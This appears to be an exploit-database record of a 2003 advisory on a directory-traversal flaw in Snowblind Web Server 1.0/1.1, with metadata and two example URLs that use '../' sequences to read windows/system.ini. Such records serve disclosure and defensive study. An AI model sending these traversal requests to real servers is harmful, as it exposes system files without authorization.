Snowblind 1.0/1.1 - Web Server File Disclosure

Author: euronymous
type: remote
platform: windows
port: 
date_added: 2003-05-16  
date_updated: 2012-11-10  
verified: 1  
codes: CVE-2003-0312;OSVDB-4164  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22609.txt  

source: https://www.securityfocus.com/bid/7618/info

It has been announced that Snowblind Web Server is vulnerable to a condition that may result in the disclosure of potentially sensitive information.

According to the report, Snowblind Web Server does not perform correct access validation on client requested paths which include "../" character sequences.

http://www.example.com/../../windows/system.ini
http://www.example.com/internal.sws?../../windows/system.ini